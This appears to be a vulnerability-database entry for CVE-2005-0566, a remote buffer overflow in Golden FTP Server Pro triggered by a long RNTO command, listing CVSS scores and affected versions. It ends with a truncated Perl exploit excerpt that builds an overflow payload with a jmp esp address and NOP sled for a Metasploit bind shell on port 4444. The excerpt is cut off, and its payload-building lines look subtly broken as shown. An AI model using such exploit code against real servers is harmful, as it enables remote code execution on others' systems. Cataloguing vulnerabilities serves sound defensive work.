7.5
CVSSv2

CVE-2005-0566

Published: 22/01/2005 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in Golden FTP Server Pro (goldenftpd) 2.x allows remote malicious users to execute arbitrary code via a long RNTO command.

Vulnerable Product Search on Vulmon Subscribe to Product

kmint21 software golden ftp server 1.20b

kmint21 software golden ftp server 1.30b

kmint21 software golden ftp server 1.31b

kmint21 software golden ftp server 2.02b

kmint21 software golden ftp server 1.00b

Exploits

#!/usr/bin/perl -w # Barabas - wwwwhitehatcoil - # cheers to muts and all peeps at WH # XPSP2 goldenftpserver sploit - bind 4444 use strict; use Net::FTP; my $payload="\x41"x260; $payload ="\x65\x82\xa5\x7c";#jmpesp $payload ="\x90"x32;#not really necessaryblah # win32_bind - EXITFUNC=seh LPORT=4444 Size=321 Encoder=None metasploit ...